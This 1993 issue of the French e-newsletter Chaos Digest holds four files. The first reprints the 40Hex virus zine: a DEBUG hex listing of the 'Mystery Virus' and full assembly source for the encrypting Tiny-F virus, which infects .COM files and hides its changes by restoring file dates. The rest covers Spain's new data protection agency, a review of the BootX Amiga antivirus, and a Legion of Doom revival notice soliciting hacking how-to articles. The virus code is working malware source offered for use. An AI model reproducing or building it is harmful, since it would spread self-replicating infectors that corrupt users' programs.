Chaos Digest              Vendredi 28 Mai 1993        Volume 1 : Numero 40
                            ISSN 1244-4901

      Editeur: Jean-Bernard Condat ([email protected])
      Archiviste: Yves-Marie Crabbe
      Co-Redacteurs: Arnaud Bigare, Stephane Briere

TABLE DES MATIERES, #1.40 (28 Mai 1993)
File 1--40H VMag Issue 1 Volume 3 #008(2)-010 (reprint)
File 2--Agence de Protection des Donnees Espagnoles (creation)
File 3--"BootX" pour Amiga (critique)
File 4--Nouveau rebondissement de _The Legion of Doom_ (news)

Chaos Digest is a weekly electronic journal/newsletter. Subscriptions are
available at no cost by sending a message to:
               [email protected]
with a mail header or first line containing the following informations:
                   X-Mn-Admin: join CHAOS_DIGEST

The editors may be contacted by voice (+33 1 47874083), fax (+33 1 47877070)
or S-mail at: Jean-Bernard Condat, Chaos Computer Club France [CCCF], B.P.
155, 93404 St-Ouen Cedex, France.  He is a member of the EICAR and EFF (#1299)
groups.

Issues of ChaosD can also be found from the ComNet in Luxembourg BBS (+352)
466893.  Back issues of ChaosD can be found on the Internet as part of the
Computer underground Digest archives. They're accessible using anonymous FTP:

       * kragar.eff.org [192.88.144.4] in /pub/cud/chaos
       * uglymouse.css.itd.umich.edu [141.211.182.53] in /pub/CuD/chaos
       * halcyon.com [192.135.191.2] in /pub/mirror/cud/chaos
       * ftp.cic.net [192.131.22.2] in /e-serials/alphabetic/c/chaos-digest
       * ftp.ee.mu.oz.au [128.250.77.2] in /pub/text/CuD/chaos
       * nic.funet.fi [128.214.6.100] in /pub/doc/cud/chaos
       * orchid.csv.warwick.ac.uk [137.205.192.5] in /pub/cud/chaos

CHAOS DIGEST is an open forum dedicated to sharing French information among
computerists and to the presentation and debate of diverse views. ChaosD
material may be reprinted for non-profit as long as the source is cited.
Some authors do copyright their material, and they should be contacted for
reprint permission.  Readers are encouraged to submit reasoned articles in
French, English or German languages relating to computer culture and
telecommunications.  Articles are preferred to short responses.  Please
avoid quoting previous posts unless absolutely necessary.

DISCLAIMER: The views represented herein do not necessarily represent
           the views of the moderators. Chaos Digest contributors
           assume all responsibility for ensuring that articles
           submitted do not violate copyright protections.

----------------------------------------------------------------------

Date: Tue May 11 09:24:40 PDT 1993
From: [email protected] (American_Eagle_Publication_Inc. )
Subject: File 1--40H VMag Issue 1 Volume 3 #008(2)-010 (reprint)

[suite du listing du "Mystery Virus":]


e 0530  22 00 8A E0 E8 1D 00 3D 6F 63 74 0C 3D 78 65 75
e 0540  10 E8 10 00 3C 65 EB 09 E8 09 00 3C 6D EB 02 FE
e 0550  C0 5E 58 C3 AC 3C 43 72 06 3C 59 73 02 04 20 C3
e 0560  9C 80 FC 68 2E FF 1E 91 07 C3 1E 06 56 57 50 53
e 0570  51 52 8C DE 33 C0 8E D8 C4 06 90 00 06 50 C7 06
e 0580  90 00 26 03 8C 0E 92 00 8E DE 33 C9 B8 00 43 E8
e 0590  CE FF 8B D9 80 E1 FE 3A CB 74 07 B8 01 43 E8 BF
e 05A0  FF F9 9C 1E 52 53 B8 02 3D E8 B4 FF 72 0A 8B D8
e 05B0  E8 26 00 B4 3E E8 A8 FF 59 5A 1F 9D 73 06 B8 01
e 05C0  43 E8 9C FF 33 C0 8E D8 8F 06 90 00 8F 06 92 00
e 05D0  5A 59 5B 58 5F 5E 07 1F C3 0E 1F 0E 07 BA 95 07
e 05E0  B9 18 00 B4 3F E8 78 FF 33 C9 33 D2 B8 02 42 E8
e 05F0  6E FF 89 16 AF 07 3D 00 0B 83 DA 00 72 6C A3 AD
e 0600  07 81 3E 95 07 4D 5A 75 17 A1 9D 07 03 06 AB 07
e 0610  E8 91 01 03 06 A9 07 83 D2 00 8B CA 8B D0 EB 15
e 0620  80 3E 95 07 E9 75 44 8B 16 96 07 81 C2 03 01 72
e 0630  3A FE CE 33 C9 B8 00 42 E8 25 FF 05 00 07 90 83
e 0640  D2 00 3B 06 AD 07 75 23 3B 16 AF 07 75 1D BA B1
e 0650  07 8B F2 B9 EF 02 B4 3F E8 05 FF 72 0E 3B C8 75
e 0660  0A BF 49 00 AC AE 75 03 E2 FA C3 33 C9 33 D2 B8
e 0670  02 42 E8 EB FE A3 45 07 89 16 47 07 81 3E 95 07
e 0680  4D 5A 74 0A 05 95 09 90 83 D2 00 74 19 C3 8B 16
e 0690  AD 07 F6 DA 83 E2 0F 33 C9 B8 01 42 E8 C1 FE A3
e 06A0  AD 07 89 16 AF 07 B8 00 57 E8 B4 FE 9C 51 52 81
e 06B0  3E 95 07 4D 5A 74 05 B8 00 01 EB 07 A1 A9 07 8B
e 06C0  16 AB 07 2E C7 06 47 00 00 07 BF 3A 07 AB 8B C2
e 06D0  AB A1 A5 07 AB A1 A3 07 AB BE 95 07 A4 A5 33 D2
e 06E0  B9 49 07 90 B4 40 E8 77 FE 72 27 33 C8 75 23 8B
e 06F0  D1 B8 00 42 E8 69 FE 81 3E 95 07 4D 5A 74 15 C6
e 0700  06 95 07 E9 A1 AD 07 05 46 00 A3 96 07 B9 03 00
e 0710  EB 57 EB 5D E8 8A 00 F7 D0 F7 D2 40 75 01 42 03
e 0720  06 AD 07 13 16 AF 07 B9 10 00 F7 F1 C7 06 A9 07
e 0730  49 00 A3 AB 07 05 72 00 A3 A3 07 C7 06 A5 07 00
e 0740  01 81 06 AD 07 49 07 83 16 AF 07 00 A1 AD 07 25
e 0750  FF 01 A3 97 07 9C A1 AE 07 D0 2E B0 07 D1 D8 9D
e 0760  74 01 40 A3 99 07 B9 18 00 BA 95 07 B4 40 E8 EF
e 0770  FD 5A 59 9D 72 06 B8 01 57 E8 E4 FD C3 1E E8 07
e 0780  00 C6 06 00 00 4D 1F C3 50 53 B4 62 E8 D1 FD 8C
e 0790  C8 48 4B 8E DB F9 13 1E 03 00 3B D8 72 F5 5B 58
e 07A0  C3 A1 9D 07 BA 10 00 F7 E2 C3 FE FF FD 00 FE 40
e 07B0  75 73 73 72 40 40 40 40 40 76 89 92 95 73 8F 86
e 07C0  94 40 40 48 83 49 40 40 96 51 4E 40 51 59 59 50
e 07D0  40 FD 00 FE FC FD 00 4A 01 03 01 B8 01 0B 01 4A
e 07E0  01 06 01 72 01 01 02 9F 01 09 01 15 01 02 02 15
e 07F0  01 03 02 72 01 08 01 4A 01 05 02 26 01 01 01 4A
e 0800  01 08 02 15 01 03 02 15 01 03 03 26 01 08 02 26
e 0810  01 05 01 4A 01 01 02 72 01 08 01 72 01 04 01 72
e 0820  01 04 00 72 01 08 02 9F 01 06 02 B8 01 01 02 EE
e 0830  01 0F FF FF FF 00 00 00 01 00 00 00 00 00 00 00
e 0840  01 3A 16 D8 8E C3 8E B8 00 4C 05 00 00 00 1A 1A

rcx
74e
w
q

+++++

40Hex Issue 3                                                      0009

                           The Tiny-F Virus

      In our first issue we gave you the source for the Tiny-B virus.
      Well some people don't quit.

      After months of struggling Psyco-genius decided to give
      his attempts to make this a good virus over to someone who
      knows what he's doning.

      So Dark (mastered assembler in one week) Angel did some mods
      and here we have it.

-------------------------------------------------------------------------
tinyv   SEGMENT BYTE PUBLIC 'code'
       ASSUME  CS:tinyv, DS:tinyv, SS:tinyv, ES:tinyv

       ORG     100h

DOS     EQU     21h

start:  JMP     pgstart
exlbl:  db      0CDh, 20h, 7, 8, 9
pgstart:CALL    tinyvir
tinyvir:
       POP     SI                      ; get SI for storage
       SUB     SI,offset tinyvir       ; reset SI to virus start
       MOV     BP,[SI+blnkdat]         ; store SI in BP for return
       ADD     BP, OFFSET exlbl
       CALL    endecrpt
       JMP     SHORT realprog

;------------------------------------------------------------------------
;nonencrypted subroutines start here
;------------------------------------------------------------------------

;PCM's encryption was stupid, mine is better - Dark Angel
endecrpt:
;Only need to save necessary registers - Dark Angel
       PUSH    AX                      ; store registers
       PUSH    BX
       PUSH    CX
       PUSH    SI
;New, better, more compact encryption engine
       MOV     BX, [SI+EN_VAL]
       ADD     SI, offset realprog
       MOV     CX, endenc - realprog
       SHR     CX, 1
       JNC     start_encryption
       DEC     SI
start_encryption:
       MOV     DI, SI
encloop:
       LODSW                           ;DS:[SI] -> AX
       XOR     AX, BX
       STOSW
       LOOP    encloop

       POP     SI                      ;restore registers
       POP     CX
       POP     BX
       POP     AX
       RET
;-----end of encryption routine
nfect:
       CALL    endecrpt
       MOV     [SI+offset endprog+3],AX;point to data
       MOV     AH,40H                  ;write instruction
       LEA     DX,[SI+0105H]           ;write buffer loc    |
       MOV     CX,offset endprog-105h  ;(size of virus)  --\|/--
       INT     DOS                     ;do it!
       PUSHF
       CALL    endecrpt
       POPF
       JC      outa1                    ;error, bug out
       RET
outa1:
       JMP     exit


;------------------------------------------------------------------------
;    Unencrypted routines end here
;------------------------------------------------------------------------
realprog:
       CLD                             ;forward direction for string ops
;Why save DTA?  This part killed.  Saves quite a few bytes.  Dark Angel
;Instead, set DTA to SI+ENDPROG+131h
       MOV     AH, 1Ah                 ;Set DTA
       LEA     DX, [SI+ENDPROG+131h]   ; to DS:DX
       INT     21h

       LEA     DX,[SI+fspec]           ;get filespec (*.COM)
       XOR     CX, CX                  ;       ||   (clear regs)
       MOV     AH,4EH                  ;       ||   (find files)
mainloop:                               ;      \||/
       INT     DOS                     ;   ----\/----
       JC      hiccup                  ;no more files found, terminate virus
;Next part had to be changed to account for new DTA address - Dark Angel
       LEA     DX, [SI+ENDPROG+131h+30];set file name pointer
                                       ;(offset 30 is DTA filename start)
       MOV     AX,3D02H                ;open file
       INT     DOS                     ;do it!
       MOV     BX,AX                   ;move file handle to BX
       MOV     AH,3FH                  ;read file
       LEA     DX,[SI+endprog]         ;load end of program (as buffer pntr)
       MOV     DI,DX                   ;set Dest Index to area for buffer
       MOV     CX,0003H                ;read 3 bytes
       INT     DOS                     ;do it!
       CMP     BYTE PTR [DI],0E9H      ;check for JMP at start
       JE      infect                  ;If begins w/JMP, Infect
nextfile:
       MOV     AH,4FH                  ;set int 21 to find next file
       JMP     mainloop                ;next file, do it!
hiccup: JMP     exit
infect:
       MOV     AX,5700h                ;get date function
       INT     DOS                     ;do it!
       PUSH    DX                      ;store date + time
       PUSH    CX
       MOV     DX,[DI+01H]             ;set # of bytes to move
       MOV     [SI+blnkdat],DX         ; "  " "    "   "   "
;Tighter Code here - Dark Angel
       XOR     CX,CX                   ; "  " "    "   "   " (0 here)
       MOV     AX,4200H                ;move file
       INT     DOS                     ;do it!
       MOV     DX,DI                   ;set dest index to area for buffer
       MOV     CX,0002H                ;two bytes
       MOV     AH,3FH                  ;read file
       INT     DOS                     ;do it!
       CMP     WORD PTR [DI],0807H     ;check for infection
       JE      nextfile                ;next file if infected
getaval:                                ;encryption routine starts here
;My modifications here - Dark Angel
       MOV     AH, 2Ch                 ;DOS get TIME function
       INT     DOS                     ;do it!
       OR      DX, DX                  ;Is it 0?
       JE      getaval                 ;yeah, try again
       MOV     word ptr [si+offset en_va], DX ; Store it
;Tighter code here - Dark Angel
       XOR     DX,DX                   ;clear regs
       XOR     CX,CX                   ;  "    "
       MOV     AX,4202H                ;move file pointer
       INT     DOS                     ;do it!
       OR      DX,DX                   ;new pointer location 0?
       JNE     nextfile                ;if no then next file
       CMP     AH,0FEH                 ;new pointer loc too high?
       JNC     nextfile                ;yes, try again
       CALL    nfect
       MOV     AX,4200H                ;move pointer
       XOR     CX, CX                  ;clear reg
       MOV     DX,OFFSET 00001         ;where to set pointer
       INT     DOS                     ;do it!
       MOV     AH,40H                  ;write to file
       LEA     DX,[SI+offset endprog+3];write data at SI+BUFFER
       MOV     CX,0002H                ;two bytes (the JMP)
       INT     DOS                     ;do it!
       MOV     AX,5701h                ;store date
       POP     CX                      ;restore time
       POP     DX                      ;restore date
       INT     DOS                     ;do it!
exit:
       MOV     AH,3EH                  ;close file
       INT     DOS                     ;do it!

;Return DTA to old position - Dark Angel

       MOV     AH, 1Ah                 ;Set DTA
       MOV     DX, 80h                 ; to PSP DTA
       INT     21h

       JMP     BP

;------------------------------------------------------------------------
;encrypted data goes here
;------------------------------------------------------------------------

fspec   LABEL   WORD
       DB      '*.COM',0
nondata DB      'Tiny-F version 1.1'    ;Program identification
       DB      '%$!"&%',=)%&-!'        ;author identification
       DB      'Released 10-19-91'     ;release date
endenc  LABEL   BYTE                    ;end of encryption zone
;------------------------------------------------------------------------
;nonencrypted data goes anywhere after here
;------------------------------------------------------------------------

blnkdat LABEL   WORD
       DW      0000H

;Only en_val is needed now because of new encryption mechanism
en_val  DW      0h

endprog LABEL   WORD
tinyv   ENDS
       END     start

+++++

40Hex Issue 3                                                       0010

                             In Closing

    Well that will do it for this issue.  Sorry it took so damn long,
    but screw it.

    Next issue we will have more articals, more viruses, and all that.

    We were supposed to have an interview with an Amiga virus writer
    this issue but we just couldn't get it in time.  Also we were
    planning an interview with John Mcafee, but the same story there.

    Also next issue, I hope to have the Bob Ross virus, from the
    twisted mind of Dark Angel.  And If I can find it, the DIR-2 virus
    and The Teqeulla Virus, so I can't spell.

    See you then.

------------------------------

Date: Sun, 16 May 93 21:01:10 -0100
From: [email protected] (Rafael Fernandez Calvo )
Subject: File 2--Agence de Protection des Donnees Espagnoles (creation)


   CCCCC  LL     II
  CC      LL     II
  CC      LL     II    --  N E W S   FROM   S P A I N  --- May 16, 1993
   CCCCC  LLLLLL II

COMMISSION for LIBERTIES
and INFORMATICS (*)


      DATA PROTECTION AGENCY CREATED BY THE SPANISH COVERNMENT
      ++++++++++++++++++++++++++++++++++++++++++++++++++++++++

    The Government of the Kingdom of Spain approved on May 4th, 1993 the
Estatute of the Data Protection Agency (Agencia de Proteccion de Datos), the
body that, according to the Law on Protection of Personal Data (whose acronym
is LORTAD) approved by the Spanish Parliament in October 1992, will watch
over proper observance of this law.

    According to its Estatute, the Agency is an independent body, headed
by its Director, who will be nominated by the Government among the members
of the Consultive Council. The Council will have nine members, elected for
a period of four years by the Congress, the Senate, the Ministry of Justice,
the Regional Governments, the Federation of Provinces and Cities, the Royal
Academy of History, the Council of Universities, the Council of Consumers and
Users, and the Council of Chambers of Commerce, respectively. Trade Unions
and DP Professionals will not be represented in spite of the proposals of
CLI, that also submitted one of having the Director nominated by the Council
itself instead of by the Government in order to insure the independence of
the Agency

    Among the powers of the Agency are those of dictating fines of up to
1 Million US $ and sealing personal data files of companies and entities that
infringe the law. The Agency will the body representing Spain in the European
Community, the Council of Europe and the Schengen Agreement on free
circulation of people within the EC borders for all the matters regarding
personal data protection.

    The Data Protection Agency will have to be created in the middle of a
sharp campaign for Congress and Parliament in elections that will be held on
June 6, whose outcome, according to the polls, will be very tight between the
ruling Socialist Party and the center-right People's Party, with a well
placed third party: United Left (a communist-led coalition). These two
parties gave strong support to the position of CLI with regard to the LORTAD
during its discussion in Congress and Senate.

     CLI achieved in February its goal of seeing the appeal against the
Personal Data Law put before the Constitutional Court of Spain by the
Ombudsman, the Peoples' Party and the Regional Parliament of Catalonia. The
appeals address basically the concerns of CLI that the law establishes a lot
of unjustified exceptions in favour of Government with regard to the rights
that citizens have about their personal data. Even though the appeals don't
interrupt the application of the law since Jan. 31, they leave the door open
to its modification in the sense promoted by CLI.

    Let's recall that Spain is one of the very few countries whose Carta
Magna foresees the dangers that can stem from misuse of Information
Technology. In fact, its Constitution establishes that a "law will limit the
use of Information Technologies in order to protect citizens' honour and
their personal and family privacy as well as the unrestricted exercise of
their rights" (article 18.4).

     The position of CLI about the LORTAD can be summarized as follows:

- The law does not fulfill the expectations arisen, although it is a step
forward in comparison with the current situation of "allegality" that has
been a constant source of severe abuse against privacy;

- The good side of the law is the regulation of personal data files
in the hands of companies and private entities. Citizens will have
wide rights to access, modification and cancellation of this kind of
records.

- The bad side stems from the following facts:

  a) The bill gives excessive and uncontrolled power to Policy Forces
  over collection and computerization of highly sensitive data: ideology,
  religion, beliefs, racial origin, health and sexual orientation.

  b) Computerized personal data records in the hands of all branches
  of Public Administrations will be in many cases excluded from the rights
  (access, modification, cancellation) given to citizens with regard to
  the same kind of data in the hands of private companies.

  c) The Data Protection Agency that will watch over proper observance of
  the law will have scarce autonomy from the Government, that will
  nominate and dismiss its Director.


* SOME WORDS ABOUT CLI

    The --Commission for Liberties and Informatics, CLI-- is an independent
and pluralistic organization that was officially constituted in April '91.

     Its mission is to "promote the development and protection of citizens'
rights, specially privacy, against misuse of Information Technologies".

    As of May '93, CLI is composed by nine organizations, with a joint
membership of about 3,000,000 people. They cover a very wide spectrum of
social interest groups: associations of computer professionals, judges, civil
rights leagues, trade unions, consumers groups, direct marketing industry,
etc.

    CLI is confederated with similar bodies created in some other Spanish
Regions such as Valencia, Basque Country and Catalonia, and has fluid
working relationships with many public and private Data Protection bodies
and entities all over the world, including CNIL, CPSR and Privacy
International.

    CLI has its headquarters in:

Padilla 66, 3 dcha.
E-28006 Madrid, Spain

Phone: (34-1) 402 9391
Fax: (34-1) 309 3685
E-mail: [email protected]

------------------------------

Date: Sun May 23 00:06:00 -0600 1993
From: [email protected] ("Rob Slade, DECrypt Editor, VARUG NLC rep )
Subject: File 3--"BootX" pour Amiga (critique)
Copyright: Robert M. Slade, 1993


                              Comparison Review

Company and product:

Peter Stuer
Kauwlei 21
B-2550 Kontich
Belgium
[email protected]
BootX 5.23

Summary: Scanner and disinfector with some operation restriction

Cost: unknown

Rating (1-4, 1 = poor, 4 = very good)
     "Friendliness"
           Installation
           Ease of use
           Help systems
     Compatibility
     Company
           Stability
           Support
     Documentation
     Hardware required
     Performance
     Availability
     Local Support

General Description:

                 Comparison of features and specifications

User Friendliness

Installation

Both automated and manual installation is provided.

Ease of use

BootX can be run from either the CLI or the Workbench.  Once invoked it can
be made the "foreground task" by a "hot key" call.  The program is menu
driven, with a comprehensive range of actions.

Help systems

Can use the AmigaGuide.library function if available.

Compatibility

Unknown but unlikely to cause problems.  Some problems are noted with
Enforcer.  Will work with certain compression programs to check compressed
executables.

Company Stability

Unknown, but this is currently one of the major recommended Amiga antivirals.
The program is distributed as freeware.

Company Support

The author's mail and email addresses are given, as well as contact info for
"Safe Hex International".

Documentation

Simple but straightforward directions on the installation and running of the
program.  There is little general discussion of viral programs and operation,
but some is mentioned in conjunction with certain features of the program.
Unusually for a shareware/freeware package there is an extensive glossary
which may provide some background.  (I learned, for instance, that a
"linkvirus" is the term for what is more generally known as a program or file
infecting virus).

System Requirements

512K RAM or higher and at least one disk drive.  KickStart v2.04 and
ReqTools.library v38 or higher.  Workbench v2.1 or higher to use the language
independence utility and v3.0 or higher to use the AmigaGuide.library help
feature.  Various decompression programs may be needed to check compressed
executables.

Performance

Unknown at this time due to lack of a test suite.  Currently one of the most
highly recommended Amiga antivirals.

Local Support

The author is reachable via Fidonet and Internet mail.

Support Requirements

Users experienced with using shareware should have no problems.

==============
Vancouver      [email protected]         | Slade's Law of Computer
Institute for  [email protected]      |        Literacy:
Research into  [email protected]         |   - There is no such thing
User           [email protected]         |     as "computer illiteracy";
Security       Canada V7K 2G6           |     only illiteracy itself.


[ChaosD: Voici les commentaires de l'auteur de ce programme sur ce papier:]

Date: Wed May 26 17:58:49 PDT 1993
From: [email protected] (Peter Stuer )

Hum...seems you're a bit behind on the news. I stopped developing BootX last
March because of lack of time.

 /~\
C oo
_( ^)
/   ~\  Peter Stuer.

--
uucp: uunet!m2xenix!puddle!2!292!603.7!Peter.Stuer
Internet: [email protected]

------------------------------

Date: Tue, 25 May 1993 10:32:28 -0400
From: [email protected] (TDC )
Subject: File 4--Nouveau rebondissement de _The Legion of Doom_ (news)


                       Final Anouncement

                              The
                              LOD
                         Legion of Doom
                            Is Back!

No that has not been a mis-print... the LOD has returned!  The world's
greatest hacking group has formally been reinstated to bring back dignity
and respect to a scene that has rapidly deteriorated since its departure.

The LOD is not just another "Group" that goes around with upper/lower case
names, trading in PBX's and VMB's and wouldn't know COSMOS if it hit them
over the head.  It's a sad day indeed when the term hacker is used to refer
to every code and credit card abusing rodent in the nation.  We intend
through our presence and many innovative projects, not to mention the
technical journal to restore the original values of technical exploration
and knowledge that the term hacker was founded on.

The LOD imbodies the pinnacle of understanding that comes from relentless
exploration of the "system" backwards and forwards.  It is an organization
dedicated to understanding the world's computer and telephone networks.
Enabling everyone to progress forward in technology.  The accumulated product
of this--the Technical Journals, full of information unavailible anywhere
except from telco manuals represents something to valuable to lose.

[...] This will be the primary of purpose the new, revived LOD - the assembly
and release of a Technical Journal.  The previous four issues, now several
years old BADLY need updating.

The Journal will rely heavily on reader submitted articles and information,
so anything you wish to contribute would be GREATLY appreciated.  Acceptable
submitions would include ORIGINAL "how-to- guides" on various systems,
security discussions, technical specifications and doccumentation.  Computer
and telephone related subjects are not the only ones acceptable.  If you
remember the former journals had articles concerning interrogation, physical
security among others.

The next LOD Technical Journal will comprise almost entirely of freelance or
reader submitted articles. So without YOUR contributions it can not proceed!
Solid progress is being made in the next Technical Journal by both free-
lancers and group members.  But bigger is better, as you can never have too
much information or instruction.

SEND UP ALL ORIGINAL ARTICLES FOR PUBLICATION!!!

If you wish to hold the wonderful honour of being an LOD Member  (Won't
this look good on the resume), you may apply by contacting us.  The
qualifications should need no elaboration.

Regardless of the unbased claims made by others, the LOD is as strong and
capable as it ever was.  Legendary groups like the LOD are not born this way.
They take time to form, and restarting almost from scratch almost three years
later, time is obviously needed.  We say to all the skeptics, hang on to your
premature judgements until we're on our feet and judge by actions not
opinions.

To set the record straight once and for all, and to convince the skeptics
that doubt the validity of all this, the Legion of Doom >IS< BACK.  Next
month, a full-fledged Technical Journal will be widely released, and you're
doubts and questions will be once and for all answered with uncontestable
fact.

In addition to needing articles for the upcoming Journals, some sites on the
net to aid in distribution would also be welcomed.  Someone willing to donate
the resources necessary to operate a subscription type mailing list service
is also needed.  Send all offers and articles to our email account or PO Box.

Reach us at:            [email protected]

Or by blindingly quick, faster than light mail at:

                               LOD
                           P.O. Box 104
                        4700 Keele Street
                      North York, ON  M3J-1P3

Closing date for article submittions to the LOD Technical Journal
Number 5 is: Monday 14 June, 1993.

Release date: Friday 18 June, 1993.

Since we have no monetary or contractual obligation to anyone, these dates
are of course tentative. But since or at least initially we will rely almost
entirely on reader submitions a date is needed to get potential writers into
gear.

Note that the LOD does not engage or condone illegal or criminal activities.
This would cover, but is not limited to, theft of long distance services,
credit fraud or data destruction/alteration.

Lord Havoc

------------------------------

End of Chaos Digest #1.40
************************************